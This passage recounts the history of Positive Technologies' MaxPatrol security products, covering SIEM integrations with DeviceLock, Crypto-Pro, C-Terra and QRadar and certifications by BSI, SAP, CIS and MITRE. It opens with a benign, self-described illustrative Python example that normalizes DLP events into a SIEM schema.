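To show what "rules for converting data received from the DLP system into the SIEM format" amount to in practice, here is an added Python example; it is not the DeviceLock connector, not DeviceLock's database layout and not MaxPatrol SIEM's event schema. The raw rows, the code tables and the target field names are constructed for the example, which also shows two handling choices a connector has to make: rows that cannot be parsed are counted and skipped rather than crashing the collector, and unknown device codes are kept visible in the normalized event rather than silently dropped.

```python
"""Normalizing device-control events from a DLP system into a common SIEM schema.

Added illustration. Not the DeviceLock connector, not DeviceLock's database
layout and not MaxPatrol SIEM's event format: the raw rows, code tables and
target field names are constructed for this example.
"""
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple

# Assumed code tables of a hypothetical DLP audit database.
DEVICE_TYPES = {1: "removable-storage", 2: "smartphone", 3: "printer"}
ACTIONS = {"R": "read", "W": "write", "C": "connect"}
VERDICTS = {0: "allowed", 1: "blocked"}
REQUIRED = ("ts", "user", "host", "dev_type", "action", "verdict")


def normalize(raw: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Convert one raw row to the common schema; return None if it cannot be mapped."""
    if any(raw.get(key) is None for key in REQUIRED):
        return None
    try:
        ts = datetime.strptime(raw["ts"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    except ValueError:
        return None                           # unparseable timestamp: skip, do not guess
    verdict = VERDICTS.get(raw["verdict"], "unknown")
    return {
        "@timestamp": ts.isoformat(),
        "source": "dlp.device-control",
        "user": raw["user"].lower(),          # normalize case so users correlate across sources
        "host": raw["host"].lower(),
        # Unknown codes stay visible instead of being silently dropped.
        "device_type": DEVICE_TYPES.get(raw["dev_type"], f"unknown-{raw['dev_type']}"),
        "action": ACTIONS.get(raw["action"], "unknown"),
        "verdict": verdict,
        "category": "policy-violation" if verdict == "blocked" else "device-activity",
        "file": raw.get("path"),
    }


def normalize_batch(rows: List[Dict[str, Any]]) -> Tuple[List[Dict[str, Any]], int]:
    """Normalize all rows; return (events, number of rows skipped)."""
    events: List[Dict[str, Any]] = []
    skipped = 0
    for row in rows:
        event = normalize(row)
        if event is None:
            skipped += 1
        else:
            events.append(event)
    return events, skipped


# Constructed raw rows resembling a device-control audit table.
RAW_ROWS = [
    {"ts": "2016-04-12 09:15:02", "user": "CORP\\IVanov", "host": "WS-0142",
     "dev_type": 1, "action": "C", "verdict": 0},
    {"ts": "2016-04-12 09:16:40", "user": "CORP\\Ivanov", "host": "WS-0142",
     "dev_type": 1, "action": "W", "verdict": 1, "path": "E:\\contracts.xlsx"},
    {"ts": "2016-04-12 09:20:11", "user": "CORP\\Petrov", "host": "WS-0201",
     "dev_type": 9, "action": "C", "verdict": 0},
    {"ts": "not a date", "user": "CORP\\Sidorov", "host": "WS-0300",
     "dev_type": 2, "action": "C", "verdict": 0},
]

if __name__ == "__main__":
    normalized, dropped = normalize_batch(RAW_ROWS)
    for item in normalized:
        print(item)
    print("skipped rows:", dropped)
```

The skipped-row count is worth exporting as a metric of its own: a sudden rise usually means the source changed its schema, and that is easier to notice than a quiet drop in event volume.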

"Valuable enterprise data can be copied from work computers to flash drives, mobile devices, cloud storage, or transferred to third parties via e-mail and other channels. DeviceLock DLP Suite monitors access to storage and processing devices, monitors user communication channels, and filters the contents of transferred files. Connecting the PT MaxPatrol SIEM system to DeviceLock DLP Suite will allow you to display all the necessary correlations from the DLP system on a single dashboard, which will fundamentally increase the responsiveness of security services to information leakage incidents and allow hot-pursuit investigations," said Sergey Vakhonin, Solutions Director at Smart Line Ink.

SurfPatrol is integrated with Crypto-Pro solutions

In the spring of 2016, Positive Technologies and Crypto-Pro announced the start of cooperation. The result of the collaboration was the integration of the SurfPatrol online service from Positive Technologies, with which you can check the security of the web browser, and the Crypto-Pro solutions designed to form an electronic signature - CryptoPro EDS Browser plug-in, CryptoPro DSS and CryptoPro DSS Lite. Combining these technologies will allow Crypto-Pro customers to reduce the risk of substitution of signed data when forming an electronic signature.

As noted, Crypto-Pro solutions are used to work with electronic document management systems: using an electronic signature, documents are certified on public services websites, client portals, Internet banking systems, purchases are made on electronic trading platforms. Thus, "CryptoPro EDS Browser plug-in" is used to form and verify electronic signatures on web pages. The software and hardware complex "CryptoPro DSS" provides secure storage of user private keys and provides authenticated access to them to form an electronic signature. Its lightweight version of CryptoPro DSS Lite is designed to sign documents of the most common formats on various platforms in a web browser.

However, the use of electronic signatures directly in a web browser entails potential risks: both the browser and its extensions often contain critical vulnerabilities that attackers can use to spoof signed data. The price of such an attack in the event of its successful implementation is serious reputational and financial losses. Therefore, one of the main tasks facing Crypto-Pro and its clients is to control the security of the web browser when forming an electronic signature, the company said.

The integration of the SurfPatrol online service from Positive Technologies into the Crypto-Pro electronic signature tools provides protection against attacks aimed at exploiting web browser vulnerabilities. Now, when a user contacts CryptoPro EDS Browser plug-in, CryptoPro DSS or CryptoPro DSS Lite, SurfPatrol will automatically analyze the operation of the web browser and its extensions and issue a verdict on their security. If vulnerabilities are detected, users will be informed about security threats, and will also receive recommendations for their elimination, Positive Technologies emphasized.

2015

MaxPatrol is ISO 15408 certified

On June 22, 2015, Positive Technologies announced the completion of certification of the MaxPatrol security control and compliance system according to the ISO 15408 standard in Germany.

The international certificate of conformity with security requirements was issued by the German Federal Office for Information Security (BSI), the German counterpart of FSTEC in Russia.

The ISO 15408 standard "Common Criteria for Information Technology Security Evaluation" (abbreviated Common Criteria or CC) was adopted in 1999 as a unified international standard for certifying information systems against security requirements. The standard allows security targets to be drawn up: unified documents in which the security requirements for a product are set out, developers declare the security properties of their product, security evaluators determine whether the product satisfies these claims, and consumers evaluate whether the product is suitable for their computer systems. Thus, the standard provides conditions in which the process of describing, developing and verifying a product against security requirements is carried out with the necessary rigor.

The certification procedure provided by ISO 15408 has two important differences from other types of conformity assessment:

  • unlike, for example, certification for compliance with technical specifications, the developer of the certified product is obliged not only to declare the security functions of his solution, but also to justify the sufficiency of these functions to counter threats characteristic of the conditions under which operation is expected.

  • the certificate indicates the assurance level (Evaluation Assurance Level, EAL), which allows the consumer of a certified solution to judge how deeply the solution was investigated during certification tests.

The MaxPatrol system certificate confirms that the system security functions prevent unauthorized access to scan results, settings, and other important information processed by the system.

The tests were carried out at the EAL2 assurance level, which provides for testing of the product by the testing laboratory, a detailed study of the design documentation and of the development and testing processes, and a search for vulnerabilities in the files of the system distribution.

"This is the first successful certification of a software product of a Russian company abroad under the CCRA agreement. I will not hide that when we first started this work, we had some concerns that political complications would prevent it from being completed. But, fortunately, they did not materialize," said Dmitry Kuznetsov, director of methodology and standardization at Positive Technologies. "Comparing the experience of foreign and Russian certification, we did not notice any significant differences in the work of German and Russian testing laboratories. The main difficulty, perhaps, turned out to be the need to develop a set of documentation in the form established by the requirements of ISO 15408: the composition and content of the documents are radically different from what the usual SPD standards prescribe to Russian developers."

MaxPatrol integrated with C-Terra products

On December 1, 2015, S-Terra CSP and Positive Technologies announced the completion of testing the integration capabilities of the C-Terra Gateway and C-Terra Client products into the PT MaxPatrol SIEM system.

MaxPatrol SIEM users were able to view security events from C-Terra devices along with incidents from third-party products.

Now security systems created on the C-Terra product platform are integrated with the universal security platform from Positive Technologies, the main element of which is MaxPatrol SIEM.

Christopher Gazarov, Technical Director of S-Terra CSP LLC, said:

- Compatibility with Positive Technologies' MaxPatrol SIEM system is an important step towards a user who wants not only to reliably protect his network with C-Terra products, but also to monitor system events in real time. The integration of our products has made managing corporate network information security even more effective.

Sergey Pavlov, Network Technology Director of Positive Technologies, noted:

- Positive Technologies always meets its customers halfway. It is known that full protection of any infrastructure requires support for all information protection tools. S-Terra products are used in many large Russian companies, for example, Russian Post, MMC Norilsk Nickel, SO UES. Support for these products in MaxPatrol SIEM allows you to expand the attack visibility horizon and correlate events at a higher level.

According to the companies, the integration of PT MaxPatrol SIEM with the C-Terra Gateway and S-Terra Client products makes it possible to identify information security incidents, investigate them and identify intruders.

2014

Integration with IBM Security QRadar SIEM

On July 7, 2014, Positive Technologies announced the integration of the MaxPatrol security and compliance control system with the IBM Security QRadar SIEM solution, designed to manage information security events and incidents.

Compatibility of these products will help facilitate the creation of an information security management system.

According to the developers, IBM Security QRadar SIEM correlates data coming from network devices, security systems, servers, endpoints, applications and vulnerability scanners, then notifies administrators of incidents and helps security and IT staff make decisions.

MaxPatrol combines mechanisms for system checks, penetration testing, compliance control, combined with support for network equipment analysis, operating systems, DBMS, application and ERP systems and web applications. The system allows you to form consistent corporate standards, automate inventory processes, control changes, evaluate IT and information security processes using key performance indicators.

Information about vulnerabilities and compliance with standards collected by MaxPatrol can be automatically transmitted to QRadar, expanding the capabilities of this SIEM.

Positive Technologies receives SAP certification

The MaxPatrol Security and Compliance Monitoring System, developed by Positive Technologies, was certified by SAP, a developer of ERP systems and business applications, and received the status of SAP Certified Integration with SAP NetWeaver.

The certificate confirms that MaxPatrol works correctly with SAP NetWeaver (versions 7.0 and later) and complies with SAP integration standards. The techniques and methods of obtaining data that are used in MaxPatrol are checked and fully approved by the specialists of the German company, and Positive Technologies is included in the number of certified partners of SAP AG.

The collaboration between Positive Technologies and SAP has been going on for several years. Positive Technologies experts conduct specialized penetration tests and security audits of ERP systems and help eliminate identified vulnerabilities. All knowledge gained during such work and related checks are included in the MaxPatrol knowledge base, and some of the security flaws are detected by heuristic mechanisms of the system.

Back in 2009, one of the first in its class, MaxPatrol received mechanisms for identifying security flaws and checking configurations in accordance with ISACA and SAP Security Guides recommendations. Currently, MaxPatrol is used by more than 1000 companies around the world, and the largest SAP installations protected by Positive Technologies products have more than 700 copies of the system and provide interaction for more than 400 thousand users.

MaxPatrol capabilities are not limited to checking basic SAP components: new enhancements allow you to control the security of SAP HCM modules (Human Capital Management), SAP MM (Material Management), SAP SRM (Supplier Relationship Management) and SAP ERP (Enterprise Resource Planning) and control the security of business-critical applications at all levels, from network infrastructure to application elements.

In 2013, Positive Technologies released Application Inspector and Application Firewall, new products that provide source code analysis for proprietary applications and proactively protect critical applications from computer attacks and fraud. Both products are SAP specific: PT AI supports application analysis in SAP ABAP and SAP Java, and PT AF contains specialized modules for blocking zero-day attacks directed at SAP Portal.

2013

MaxPatrol is certified by Center for Internet Security

Positive Technologies announced in the spring of 2013 that the MaxPatrol Security and Compliance Control System had received a CIS Security Software Certification for CIS Security Benchmarks compliance certificate from the Center for Internet Security, a non-profit organization that plays a leading role in information security standardization in the United States. Obtaining this certificate means that the implementation of Compliance mode in MaxPatrol meets the CIS requirements for automated configuration monitoring and security analysis systems. Currently, MaxPatrol is supplied with checks for more than 150 standards for a wide range of systems, from network equipment to industrial control systems (ICS), SAP and ERP systems, with about half of the standards used being CIS standards.

It is the Security Benchmarks division that develops information security standards and recommendations based on a consensus on the best practices, which is developed within the IT community by numerous information security experts. These recommendations help millions of companies around the world adequately assess the degree of security of their information resources and obtain the most up-to-date information about the secure configuration of various systems. Positive Technologies experts are actively involved in the development of security requirements for CIS standards.

2010

In July 2010, the development company announced that it had developed a security and compliance analysis module for the HP-UX operating system and for systems and applications based on it. The module is included in the standard delivery of the MaxPatrol security and compliance system.

Use of the module reduces the cost of maintaining HP-UX systems in a secure state and the cost of ensuring compliance with the requirements of industry, state and international standards, such as the Federal Law "On Personal Data," PCI DSS, SOX and ISO. In the current implementation, the MaxPatrol system can detect and control the elimination of more than 200 errors related to the management of updates and settings of the HP-UX system. Compliance mode controls about 100 key OS and application configuration parameters related to meeting the requirements of standards.

The verification system was designed using the HP Partner Virtualization Program (HP PVP) environment provided by HP.

The functionality of MaxPatrol allows you to ensure a continuous technical audit of the security of the entire information system and its individual components. The main advantages of the MaxPatrol solution are:

  • proactive protection of corporate resources using automatic information security monitoring;
  • automated control of compliance of the security system with industry and international standards;
  • automation of vulnerability management, resource inventory, security policy compliance and change control processes;
  • comprehensive analysis of complex systems, including Cisco network equipment, Windows, Linux and Unix, DBMS (Microsoft SQL Server, Oracle), network applications and proprietary web services;
  • the ability to monitor the information system for compliance with corporate requirements and security policies.

Solutions based on MaxPatrol are delivered to medium and large organizations with more than 300 automated workplaces. In such companies, security analysis is a time-consuming set of measures. It includes an inventory of equipment, control of the composition of software and the relevance of its versions, analysis of data on network infrastructure nodes, monitoring vulnerabilities and risks of theft of confidential data, assessment of the security of web applications and the relevance of antivirus databases, control of network device configurations. All these measures are complicated by the need to comply with the requirements of corporate security policies, regulators, security standards, compare and agree on their norms.

Using solutions based on MaxPatrol, companies move from solving this set of tasks piecemeal to systematic security monitoring: they form consistent corporate security standards, automate the processes of inventory, change control, vulnerability management and compliance control, and assess the effectiveness of IT and information security processes using established indicators. By automating many tasks, companies can reduce the effort of monitoring information security and reduce the operational costs of maintaining the required level of security of the IT infrastructure.

The main product of Positive Technologies, the MaxPatrol security and compliance control system, was officially certified in early 2012 by the non-profit MITRE Corporation as CVE-Compatible. This means that MaxPatrol is recognized as CVE compatible and meets all the requirements of the creators of the standard.

The generally recognized Common Vulnerabilities and Exposures (CVE) classification of vulnerabilities allows information security market participants to speak the same language. Within the framework of this project, each vulnerability or threat is given a name and a brief description according to strictly defined rules.

Support for CVE identifiers opens up opportunities for information security experts to integrate MaxPatrol with other systems, and also allows them to substantively compare its efficiency with similar products from other manufacturers when used within the same information infrastructure, and to assess the overall efficiency of their joint operation. Since 1999, the non-profit MITRE Corporation has maintained and developed a single CVE standard, continually adding to the open vulnerability database. This project was a response to the confusion that long reigned in the field of information security, in which different manufacturers of security products could refer to the same vulnerability by completely different names. Knowing the CVE identifier of a specific vulnerability and using any product with CVE-Compatible status, you can get information about this security issue. Since the standard's launch, the number of organizations supporting CVE has been growing rapidly; today there are more than 150 of them. A complete list of such organizations and their products is presented on the official website of the standard.

Notes

  1. Knowledge base with a description of the tactics, techniques and procedures used by attackers
  2. Delivery of examination packages to MaxPatrol SIEM is a regular automated transfer of knowledge in the field of information security incident detection in the form of algorithms that allow detecting even complex atypical attacks. The appropriate sets of rules and recommendations are formed by Positive Technologies (R&D and PT Expert Security Center) experts, who continuously analyze current threats, investigate the full cycle of attacks and develop ways to detect them. These sets are bundled and transferred to the Positive Technologies Knowledge Base, which is part of MaxPatrol SIEM. Then the user can select packages of interest in the PT KB interface and apply them as part of his product installation.
  3. Previous examination packages cover the tactics "Execution," "Defense Evasion," "Lateral Movement," "Persistence" and "Credential Access."
  4. Delivery of examination packages to MaxPatrol SIEM is a regular automated transfer of knowledge in the field of information security incident detection in the form of algorithms that allow detecting even complex atypical attacks. The appropriate sets of rules and recommendations are formed by Positive Technologies experts (R&D and PT Expert Security Center), who continuously analyze current threats, investigate the full cycle of attacks and develop ways to detect them. Rule and recommendation sets are bundled and transferred to the Positive Technologies Knowledge Base (PT KB), which is part of MaxPatrol SIEM. The system user can then select the packages of interest in the PT KB interface and apply them as part of his product installation.